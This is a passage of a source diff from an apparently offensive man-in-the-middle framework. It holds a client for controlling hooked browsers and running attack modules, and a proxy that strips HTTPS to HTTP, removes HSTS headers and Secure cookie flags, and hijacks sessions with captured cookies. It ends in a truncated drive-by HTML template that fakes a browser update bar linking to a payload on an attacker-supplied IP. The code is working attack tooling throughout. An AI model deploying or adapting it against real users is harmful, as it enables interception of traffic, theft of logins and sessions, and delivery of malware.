def findbyname(self, m_name):
pmodules = ModuleList([])
for m in self.data:
if (m.name.lower().find(m_name.lower()) != -1) :
pmodules.append(m)
return pmodules
class SessionList(UserList):
def __init__(self, slist):
self.data = slist
def findbysession(self, session):
for s in self.data:
if s.session == session:
return s
def findbyos(self, os):
res = SessionList([])
for s in self.data:
if (s.os.lower().find(os.lower()) != -1):
res.append(s)
return res
def findbyip(self, ip):
res = SessionList([])
for s in self.data:
if ip == s.ip:
res.append(s)
return res
def findbyid(self, s_id):
for s in self.data:
if s.id == s_id:
return s
def findbybrowser(self, browser):
res = SessionList([])
for s in self.data:
if browser == s.name:
res.append(s)
return res
def findbybrowser_v(self, browser_v):
res = SessionList([])
for s in self.data:
if browser_v == s.version:
res.append(s)
return res
def findbypageuri(self, uri):
res = SessionList([])
for s in self.data:
if uri in s.page_uri:
res.append(s)
return res
def findbydomain(self, domain):
res = SessionList([])
for s in self.data:
if domain in s.domain:
res.append(s)
return res
class ARE_Rule(object):
def __init__(self, data, url, token):
self.url = url
self.token = token
for k,v in data.iteritems():
setattr(self, k, v)
self.modules = json.loads(self.modules)
def trigger(self):
r = requests.get('{}/trigger/{}?token={}'.format(self.url, self.id, self.token))
return r.json()
def delete(self):
r = requests.get('{}/delete/{}?token={}'.format(self.url, self.id, self.token))
return r.json()
class ARE_Rules(object):
def __init__(self, url, token):
self.url = url
self.token = token
def list(self):
rules = []
r = requests.get('{}/list/all?token={}'.format(self.url, self.token))
data = r.json()
if (r.status_code == 200) and (data['success']):
for rule in data['rules']:
rules.append(ARE_Rule(rule, self.url, self.token))
return rules
def add(self, rule_path):
if rule_path.endswith('.json'):
headers = {'Content-Type': 'application/json; charset=UTF-8'}
with open(rule_path, 'r') as rule:
payload = rule.read()
r = requests.post('{}/add?token={}'.format(self.url, self.token), data=payload, headers=headers)
return r.json()
def trigger(self, rule_id):
r = requests.get('{}/trigger/{}?token={}'.format(self.url, rule_id, self.token))
return r.json()
def delete(self, rule_id):
r = requests.get('{}/delete/{}?token={}'.format(self.url, rule_id, self.token))
return r.json()
class Module(object):
def __init__(self, data, url, token):
self.url = url
self.token = token
for k,v in data.iteritems():
setattr(self, k, v)
@property
def options(self):
r = requests.get("{}/modules/{}?token={}".format(self.url, self.id, self.token)).json()
return r['options']
@property
def description(self):
r = requests.get("{}/modules/{}?token={}".format(self.url, self.id, self.token)).json()
return r['description']
def run(self, session, options={}):
headers = {"Content-Type": "application/json", "charset": "UTF-8"}
payload = json.dumps(options)
r = requests.post("{}/modules/{}/{}?token={}".format(self.url, session, self.id, self.token), headers=headers, data=payload)
return r.json()
def multi_run(self, options={}, hb_ids=[]):
headers = {"Content-Type": "application/json", "charset": "UTF-8"}
payload = json.dumps({"mod_id":self.id, "mod_params": options, "hb_ids": hb_ids})
r = requests.post("{}/modules/multi_browser?token={}".format(self.url, self.token), headers=headers, data=payload)
return r.json()
def results(self, session, cmd_id):
r = requests.get("{}/modules/{}/{}/{}?token={}".format(self.url, session, self.id, cmd_id, self.token))
return r.json()
class Log(object):
def __init__(self, log_dict):
for k,v in log_dict.iteritems():
setattr(self, k, v)
class DNS_Rule(object):
def __init__(self, rule, url, token):
self.url = url
self.token = token
for k,v in rule.iteritems():
setattr(self, k, v)
def delete(self):
r = requests.delete("{}/dns/rule/{}?token={}".format(self.url, self.id, self.token))
return r.json()
class DNS(object):
def __init__(self, data, url, token):
self.data = data
self.url = url
self.token = token
@property
def ruleset(self):
ruleset = []
r = requests.get("{}/dns/ruleset?token={}".format(self.url, self.token))
for rule in r.json()['ruleset']:
ruleset.append(DNS_Rule(rule, self.url, self.token))
return ruleset
def add(self, pattern, resource, response=[]):
headers = {"Content-Type": "application/json", "charset": "UTF-8"}
payload = json.dumps({"pattern": pattern, "resource": resource, "response": response})
r = requests.post("{}/dns/rule?token={}".format(self.url, self.token), headers=headers, data=payload)
return r.json()
def delete(self, rule_id):
r = requests.delete("{}/dns/rule/{}?token={}".format(self.url, rule_id, self.token))
return r.json()
class Hooked_Browsers(object):
def __init__(self, data, url, token):
self.data = data
self.url = url
self.token = token
@property
def online(self):
sessions = SessionList([])
for k,v in self.data['hooked-browsers']['online'].iteritems():
sessions.append(Session(v['session'], self.data, self.url, self.token))
return sessions
@property
def offline(self):
sessions = SessionList([])
for k,v in self.data['hooked-browsers']['offline'].iteritems():
sessions.append(Session(v['session'], self.data, self.url, self.token))
return sessions
class Session(object):
def __init__(self, session, data, url, token):
self.session = session
self.data = data
self.url = url
self.token = token
self.domain = self.get_property('domain')
self.id = self.get_property('id')
self.ip = self.get_property('ip')
self.name = self.get_property('name') #Browser name
self.os = self.get_property('os')
self.page_uri = self.get_property('page_uri')
self.platform = self.get_property('platform') #Ex. win32
self.port = self.get_property('port')
self.version = self.get_property('version') #Browser version
@property
def details(self):
r = requests.get('{}/hooks/{}?token={}'.format(self.url, self.session, self.token))
return r.json()
@property
def logs(self):
logs = []
r = requests.get('{}/logs/{}?token={}'.format(self.url, self.session, self.token))
for log in r.json()['logs']:
logs.append(Log(log))
return logs
def update(self, options={}):
headers = {"Content-Type": "application/json", "charset": "UTF-8"}
payload = json.dumps(options)
r = requests.post("{}/hooks/update/{}?token={}".format(self.url, self.session, self.token), headers=headers, data=payload)
return r.json()
def run(self, module_id, options={}):
headers = {"Content-Type": "application/json", "charset": "UTF-8"}
payload = json.dumps(options)
r = requests.post("{}/modules/{}/{}?token={}".format(self.url, self.session, module_id, self.token), headers=headers, data=payload)
return r.json()
def multi_run(self, options={}):
headers = {"Content-Type": "application/json", "charset": "UTF-8"}
payload = json.dumps({"hb": self.session, "modules":[options]})
r = requests.post("{}/modules/multi_module?token={}".format(self.url, self.token), headers=headers, data=payload)
return r.json()
def get_property(self, key):
for k,v in self.data['hooked-browsers'].iteritems():
for l,s in v.iteritems():
if self.session == s['session']:
return s[key]

44
core/configwatcher.py Normal file
View file

@ -0,0 +1,44 @@
#!/usr/bin/env python2.7
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import pyinotify
import threading
from configobj import ConfigObj
class ConfigWatcher(pyinotify.ProcessEvent, object):
@property
def config(self):
return ConfigObj("./config/mitmf.conf")
def process_IN_MODIFY(self, event):
self.on_config_change()
def start_config_watch(self):
wm = pyinotify.WatchManager()
wm.add_watch('./config/mitmf.conf', pyinotify.IN_MODIFY)
notifier = pyinotify.Notifier(wm, self)
t = threading.Thread(name='ConfigWatcher', target=notifier.loop)
t.setDaemon(True)
t.start()
def on_config_change(self):
""" We can subclass this function to do stuff after the config file has been modified"""
pass

View file

@ -0,0 +1,171 @@
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import urlparse
import logging
import os
import sys
import random
import re
from twisted.web.http import Request
from twisted.web.http import HTTPChannel
from twisted.web.http import HTTPClient
from twisted.internet import ssl
from twisted.internet import defer
from twisted.internet import reactor
from twisted.internet.protocol import ClientFactory
from core.logger import logger
from ServerConnectionFactory import ServerConnectionFactory
from ServerConnection import ServerConnection
from SSLServerConnection import SSLServerConnection
from URLMonitor import URLMonitor
from CookieCleaner import CookieCleaner
from DnsCache import DnsCache
formatter = logging.Formatter("%(asctime)s [Ferret-NG] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("Ferret_ClientRequest", formatter)
class ClientRequest(Request):
''' This class represents incoming client requests and is essentially where
the magic begins. Here we remove the client headers we dont like, and then
respond with either favicon spoofing, session denial, or proxy through HTTP
or SSL to the server.
'''
def __init__(self, channel, queued, reactor=reactor):
Request.__init__(self, channel, queued)
self.reactor = reactor
self.urlMonitor = URLMonitor.getInstance()
self.cookieCleaner = CookieCleaner.getInstance()
self.dnsCache = DnsCache.getInstance()
#self.uniqueId = random.randint(0, 10000)
def cleanHeaders(self):
headers = self.getAllHeaders().copy()
if 'accept-encoding' in headers:
del headers['accept-encoding']
log.debug("[ClientRequest] Zapped encoding")
if 'if-modified-since' in headers:
del headers['if-modified-since']
if 'cache-control' in headers:
del headers['cache-control']
if 'host' in headers:
try:
for entry in self.urlMonitor.cookies[self.urlMonitor.hijack_client]:
if headers['host'] == entry['host']:
log.info("Hijacking session for host: {}".format(headers['host']))
headers['cookie'] = entry['cookie']
except KeyError:
log.error("No captured sessions (yet) from {}".format(self.urlMonitor.hijack_client))
return headers
def getPathFromUri(self):
if (self.uri.find("http://") == 0):
index = self.uri.find('/', 7)
return self.uri[index:]
return self.uri
def handleHostResolvedSuccess(self, address):
log.debug("[ClientRequest] Resolved host successfully: {} -> {}".format(self.getHeader('host'), address))
host = self.getHeader("host")
headers = self.cleanHeaders()
client = self.getClientIP()
path = self.getPathFromUri()
url = 'http://' + host + path
self.uri = url # set URI to absolute
if self.content:
self.content.seek(0,0)
postData = self.content.read()
hostparts = host.split(':')
self.dnsCache.cacheResolution(hostparts[0], address)
if (not self.cookieCleaner.isClean(self.method, client, host, headers)):
log.debug("[ClientRequest] Sending expired cookies")
self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client, host, headers, path))
elif self.urlMonitor.isSecureLink(client, url):
log.debug("[ClientRequest] Sending request via SSL ({})".format((client,url)))
self.proxyViaSSL(address, self.method, path, postData, headers, self.urlMonitor.getSecurePort(client, url))
else:
log.debug("[ClientRequest] Sending request via HTTP")
#self.proxyViaHTTP(address, self.method, path, postData, headers)
port = 80
if len(hostparts) > 1:
port = int(hostparts[1])
self.proxyViaHTTP(address, self.method, path, postData, headers, port)
def handleHostResolvedError(self, error):
log.debug("[ClientRequest] Host resolution error: {}".format(error))
try:
self.finish()
except:
pass
def resolveHost(self, host):
address = self.dnsCache.getCachedAddress(host)
if address != None:
log.debug("[ClientRequest] Host cached: {} {}".format(host, address))
return defer.succeed(address)
else:
return reactor.resolve(host)
def process(self):
log.debug("[ClientRequest] Resolving host: {}".format(self.getHeader('host')))
host = self.getHeader('host').split(":")[0]
deferred = self.resolveHost(host)
deferred.addCallback(self.handleHostResolvedSuccess)
deferred.addErrback(self.handleHostResolvedError)
def proxyViaHTTP(self, host, method, path, postData, headers, port):
connectionFactory = ServerConnectionFactory(method, path, postData, headers, self)
connectionFactory.protocol = ServerConnection
#self.reactor.connectTCP(host, 80, connectionFactory)
self.reactor.connectTCP(host, port, connectionFactory)
def proxyViaSSL(self, host, method, path, postData, headers, port):
clientContextFactory = ssl.ClientContextFactory()
connectionFactory = ServerConnectionFactory(method, path, postData, headers, self)
connectionFactory.protocol = SSLServerConnection
self.reactor.connectSSL(host, port, connectionFactory, clientContextFactory)
def sendExpiredCookies(self, host, path, expireHeaders):
self.setResponseCode(302, "Moved")
self.setHeader("Connection", "close")
self.setHeader("Location", "http://" + host + path)
for header in expireHeaders:
self.setHeader("Set-Cookie", header)
self.finish()

View file

@ -0,0 +1,103 @@
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import string
class CookieCleaner:
'''This class cleans cookies we haven't seen before. The basic idea is to
kill sessions, which isn't entirely straight-forward. Since we want this to
be generalized, there's no way for us to know exactly what cookie we're trying
to kill, which also means we don't know what domain or path it has been set for.
The rule with cookies is that specific overrides general. So cookies that are
set for mail.foo.com override cookies with the same name that are set for .foo.com,
just as cookies that are set for foo.com/mail override cookies with the same name
that are set for foo.com/
The best we can do is guess, so we just try to cover our bases by expiring cookies
in a few different ways. The most obvious thing to do is look for individual cookies
and nail the ones we haven't seen coming from the server, but the problem is that cookies are often
set by Javascript instead of a Set-Cookie header, and if we block those the site
will think cookies are disabled in the browser. So we do the expirations and whitlisting
based on client,server tuples. The first time a client hits a server, we kill whatever
cookies we see then. After that, we just let them through. Not perfect, but pretty effective.
'''
_instance = None
def __init__(self):
self.cleanedCookies = set();
self.enabled = False
@staticmethod
def getInstance():
if CookieCleaner._instance == None:
CookieCleaner._instance = CookieCleaner()
return CookieCleaner._instance
def setEnabled(self, enabled):
self.enabled = enabled
def isClean(self, method, client, host, headers):
if method == "POST": return True
if not self.enabled: return True
if not self.hasCookies(headers): return True
return (client, self.getDomainFor(host)) in self.cleanedCookies
def getExpireHeaders(self, method, client, host, headers, path):
domain = self.getDomainFor(host)
self.cleanedCookies.add((client, domain))
expireHeaders = []
for cookie in headers['cookie'].split(";"):
cookie = cookie.split("=")[0].strip()
expireHeadersForCookie = self.getExpireCookieStringFor(cookie, host, domain, path)
expireHeaders.extend(expireHeadersForCookie)
return expireHeaders
def hasCookies(self, headers):
return 'cookie' in headers
def getDomainFor(self, host):
hostParts = host.split(".")
return "." + hostParts[-2] + "." + hostParts[-1]
def getExpireCookieStringFor(self, cookie, host, domain, path):
pathList = path.split("/")
expireStrings = list()
expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + domain +
";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")
expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + host +
";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")
if len(pathList) > 2:
expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" +
domain + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")
expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" +
host + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")
return expireStrings

45
core/ferretng/DnsCache.py Normal file
View file

@ -0,0 +1,45 @@
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
class DnsCache:
'''
The DnsCache maintains a cache of DNS lookups, mirroring the browser experience.
'''
_instance = None
def __init__(self):
self.customAddress = None
self.cache = {}
@staticmethod
def getInstance():
if DnsCache._instance == None:
DnsCache._instance = DnsCache()
return DnsCache._instance
def cacheResolution(self, host, address):
self.cache[host] = address
def getCachedAddress(self, host):
if host in self.cache:
return self.cache[host]
return None

View file

@ -0,0 +1,24 @@
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
from twisted.web.http import HTTPChannel
from ClientRequest import ClientRequest
class FerretProxy(HTTPChannel):
requestFactory = ClientRequest

View file

@ -0,0 +1,97 @@
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging, re, string
from core.logger import logger
from ServerConnection import ServerConnection
from URLMonitor import URLMonitor
formatter = logging.Formatter("%(asctime)s [Ferret-NG] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("Ferret_SSLServerConnection", formatter)
class SSLServerConnection(ServerConnection):
'''
For SSL connections to a server, we need to do some additional stripping. First we need
to make note of any relative links, as the server will be expecting those to be requested
via SSL as well. We also want to slip our favicon in here and kill the secure bit on cookies.
'''
cookieExpression = re.compile(r"([ \w\d:#@%/;$()~_?\+-=\\\.&]+); ?Secure", re.IGNORECASE)
cssExpression = re.compile(r"url\(([\w\d:#@%/;$~_?\+-=\\\.&]+)\)", re.IGNORECASE)
iconExpression = re.compile(r"<link rel=\"shortcut icon\" .*href=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE)
linkExpression = re.compile(r"<((a)|(link)|(img)|(script)|(frame)) .*((href)|(src))=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE)
headExpression = re.compile(r"<head>", re.IGNORECASE)
def __init__(self, command, uri, postData, headers, client):
ServerConnection.__init__(self, command, uri, postData, headers, client)
self.urlMonitor = URLMonitor.getInstance()
def getLogLevel(self):
return logging.INFO
def getPostPrefix(self):
return "SECURE POST"
def handleHeader(self, key, value):
if (key.lower() == 'set-cookie'):
value = SSLServerConnection.cookieExpression.sub("\g<1>", value)
ServerConnection.handleHeader(self, key, value)
def stripFileFromPath(self, path):
(strippedPath, lastSlash, file) = path.rpartition('/')
return strippedPath
def buildAbsoluteLink(self, link):
absoluteLink = ""
if ((not link.startswith('http')) and (not link.startswith('/'))):
absoluteLink = "http://"+self.headers['host']+self.stripFileFromPath(self.uri)+'/'+link
log.debug("[SSLServerConnection] Found path-relative link in secure transmission: " + link)
log.debug("[SSLServerConnection] New Absolute path-relative link: " + absoluteLink)
elif not link.startswith('http'):
absoluteLink = "http://"+self.headers['host']+link
log.debug("[SSLServerConnection] Found relative link in secure transmission: " + link)
log.debug("[SSLServerConnection] New Absolute link: " + absoluteLink)
if not absoluteLink == "":
absoluteLink = absoluteLink.replace('&amp;', '&')
self.urlMonitor.addSecureLink(self.client.getClientIP(), absoluteLink);
def replaceCssLinks(self, data):
iterator = re.finditer(SSLServerConnection.cssExpression, data)
for match in iterator:
self.buildAbsoluteLink(match.group(1))
return data
def replaceSecureLinks(self, data):
data = ServerConnection.replaceSecureLinks(self, data)
data = self.replaceCssLinks(data)
iterator = re.finditer(SSLServerConnection.linkExpression, data)
for match in iterator:
self.buildAbsoluteLink(match.group(10))
return data

View file

@ -0,0 +1,195 @@
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
import re
import string
import random
import zlib
import gzip
import StringIO
import sys
from core.logger import logger
from twisted.web.http import HTTPClient
from URLMonitor import URLMonitor
formatter = logging.Formatter("%(asctime)s [Ferret-NG] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("Ferret_ServerConnection", formatter)
class ServerConnection(HTTPClient):
''' The server connection is where we do the bulk of the stripping. Everything that
comes back is examined. The headers we dont like are removed, and the links are stripped
from HTTPS to HTTP.
'''
urlExpression = re.compile(r"(https://[\w\d:#@%/;$()~_?\+-=\\\.&]*)", re.IGNORECASE)
urlType = re.compile(r"https://", re.IGNORECASE)
urlExplicitPort = re.compile(r'https://([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE)
urlTypewww = re.compile(r"https://www", re.IGNORECASE)
urlwExplicitPort = re.compile(r'https://www([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE)
urlToken1 = re.compile(r'(https://[a-zA-Z0-9./]+\?)', re.IGNORECASE)
urlToken2 = re.compile(r'(https://[a-zA-Z0-9./]+)\?{0}', re.IGNORECASE)
#urlToken2 = re.compile(r'(https://[a-zA-Z0-9.]+/?[a-zA-Z0-9.]*/?)\?{0}', re.IGNORECASE)
def __init__(self, command, uri, postData, headers, client):
self.command = command
self.uri = uri
self.postData = postData
self.headers = headers
self.client = client
self.clientInfo = None
self.urlMonitor = URLMonitor.getInstance()
self.isImageRequest = False
self.isCompressed = False
self.contentLength = None
self.shutdownComplete = False
def getPostPrefix(self):
return "POST"
def sendRequest(self):
if self.command == 'GET':
log.debug(self.client.getClientIP() + "Sending Request: {}".format(self.headers['host']))
self.sendCommand(self.command, self.uri)
def sendHeaders(self):
for header, value in self.headers.iteritems():
log.debug("[ServerConnection] Sending header: ({}: {})".format(header, value))
self.sendHeader(header, value)
self.endHeaders()
def sendPostData(self):
self.transport.write(self.postData)
def connectionMade(self):
log.debug("[ServerConnection] HTTP connection made.")
self.sendRequest()
self.sendHeaders()
if (self.command == 'POST'):
self.sendPostData()
def handleStatus(self, version, code, message):
log.debug("[ServerConnection] Server response: {} {} {}".format(version, code, message))
self.client.setResponseCode(int(code), message)
def handleHeader(self, key, value):
if (key.lower() == 'location'):
value = self.replaceSecureLinks(value)
if (key.lower() == 'content-type'):
if (value.find('image') != -1):
self.isImageRequest = True
log.debug("[ServerConnection] Response is image content, not scanning")
if (key.lower() == 'content-encoding'):
if (value.find('gzip') != -1):
log.debug("[ServerConnection] Response is compressed")
self.isCompressed = True
elif (key.lower()== 'strict-transport-security'):
log.debug("[ServerConnection] Zapped a strict-transport-security header")
elif (key.lower() == 'content-length'):
self.contentLength = value
elif (key.lower() == 'set-cookie'):
self.client.responseHeaders.addRawHeader(key, value)
else:
self.client.setHeader(key, value)
def handleEndHeaders(self):
if (self.isImageRequest and self.contentLength != None):
self.client.setHeader("Content-Length", self.contentLength)
if self.length == 0:
self.shutdown()
if logging.getLevelName(log.getEffectiveLevel()) == "DEBUG":
for header, value in self.client.headers.iteritems():
log.debug("[ServerConnection] Receiving header: ({}: {})".format(header, value))
def handleResponsePart(self, data):
if (self.isImageRequest):
self.client.write(data)
else:
HTTPClient.handleResponsePart(self, data)
def handleResponseEnd(self):
if (self.isImageRequest):
self.shutdown()
else:
try:
HTTPClient.handleResponseEnd(self) #Gets rid of some generic errors
except:
pass
def handleResponse(self, data):
if (self.isCompressed):
log.debug("[ServerConnection] Decompressing content...")
data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read()
data = self.replaceSecureLinks(data)
log.debug("[ServerConnection] Read from server {} bytes of data".format(len(data)))
if (self.contentLength != None):
self.client.setHeader('Content-Length', len(data))
try:
self.client.write(data)
except:
pass
try:
self.shutdown()
except:
log.info("[ServerConnection] Client connection dropped before request finished.")
def replaceSecureLinks(self, data):
iterator = re.finditer(ServerConnection.urlExpression, data)
for match in iterator:
url = match.group()
log.debug("[ServerConnection] Found secure reference: " + url)
url = url.replace('https://', 'http://', 1)
url = url.replace('&amp;', '&')
self.urlMonitor.addSecureLink(self.client.getClientIP(), url)
data = re.sub(ServerConnection.urlExplicitPort, r'http://\1/', data)
return re.sub(ServerConnection.urlType, 'http://', data)
def shutdown(self):
if not self.shutdownComplete:
self.shutdownComplete = True
try:
self.client.finish()
self.transport.loseConnection()
except:
pass

View file

@ -0,0 +1,50 @@
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
from core.logger import logger
from twisted.internet.protocol import ClientFactory
formatter = logging.Formatter("%(asctime)s [Ferret-NG] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("Ferret_ServerConnectionFactory", formatter)
class ServerConnectionFactory(ClientFactory):
def __init__(self, command, uri, postData, headers, client):
self.command = command
self.uri = uri
self.postData = postData
self.headers = headers
self.client = client
def buildProtocol(self, addr):
return self.protocol(self.command, self.uri, self.postData, self.headers, self.client)
def clientConnectionFailed(self, connector, reason):
log.debug("Server connection failed.")
destination = connector.getDestination()
if (destination.port != 443):
log.debug("Retrying via SSL")
self.client.proxyViaSSL(self.headers['host'], self.command, self.uri, self.postData, self.headers, 443)
else:
try:
self.client.finish()
except:
pass

View file

@ -0,0 +1,83 @@
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import re
import os
class URLMonitor:
'''
The URL monitor maintains a set of (client, url) tuples that correspond to requests which the
server is expecting over SSL. It also keeps track of secure favicon urls.
'''
# Start the arms race, and end up here...
javascriptTrickery = [re.compile("http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html")]
cookies = dict()
hijack_client = ''
_instance = None
def __init__(self):
self.strippedURLs = set()
self.strippedURLPorts = dict()
@staticmethod
def getInstance():
if URLMonitor._instance == None:
URLMonitor._instance = URLMonitor()
return URLMonitor._instance
def isSecureLink(self, client, url):
for expression in URLMonitor.javascriptTrickery:
if (re.match(expression, url)):
return True
return (client,url) in self.strippedURLs
def getSecurePort(self, client, url):
if (client,url) in self.strippedURLs:
return self.strippedURLPorts[(client,url)]
else:
return 443
def addSecureLink(self, client, url):
methodIndex = url.find("//") + 2
method = url[0:methodIndex]
pathIndex = url.find("/", methodIndex)
if pathIndex is -1:
pathIndex = len(url)
url += "/"
host = url[methodIndex:pathIndex].lower()
path = url[pathIndex:]
port = 443
portIndex = host.find(":")
if (portIndex != -1):
host = host[0:portIndex]
port = host[portIndex+1:]
if len(port) == 0:
port = 443
url = method + host + path
self.strippedURLs.add((client, url))
self.strippedURLPorts[(client, url)] = int(port)

71
core/html/htadriveby.html Normal file
View file

@ -0,0 +1,71 @@
<script>
var newHTML = document.createElement('div');
newHTML.innerHTML = ' \
<style type="text/css"> \
\
#headerupdate { \
display:none; \
position: fixed !important; \
top: 0 !important; \
left: 0 !important; \
z-index: 2000 !important; \
width: 100% !important; \
height: 40px !important; \
overflow: hidden !important; \
font-size: 14px !important; \
color: black !important; \
font-weight: normal !important; \
background-color:#F0F0F0 !important; \
border-bottom: 1px solid #A0A0A0 !important; \
\
} \
\
#headerupdate h1 { \
float: left !important; \
margin-left: 2px !important; \
margin-top: 14px !important; \
padding-left: 30px !important; \
font-weight:normal !important; \
font-size: 13px !important; \
\
background:url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABsAAAAOCAYAAADez2d9AAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsIAAA7CARUoSoAAAACnSURBVDhP5ZRNCgMhDIWj6ELwFt7JE3gkT+GRPIVLwZ8Wpy4KNXFm6KLQDx4qgbwkoiyl9AAE7z0opUBrDaUUyDmDc24bw+BzXVJrnbsX72cqhkF2FmMEKSUIIaD3fiQ0xmxjGKhZCOFIcgXOOVhr5+kTdIyj0mF2RbtRomattVuiQM1WlZ8RxW90tkp0RhR/aLa6/DOiQM0YY8tklMajpiC/q+8C8AS167V3qBALWwAAAABJRU5ErkJggg==") no-repeat left top !important; \
} \
\
#headerupdate ul { \
padding: 0 !important; \
text-align: right !important; \
} \
\
#headerupdate li { \
display: inline-block !important; \
margin: 0px 15px !important; \
text-align: left !important; \
} \
\
</style> \
<div id="headerupdate"> \
<h1> \
<strong> \
_TEXT_GOES_HERE_ \
</strong> \
</h1> \
\
<ul> \
\
<li> \
<a target="_blank" href="http://_IP_GOES_HERE_/_PAYLOAD_GOES_HERE_"> \
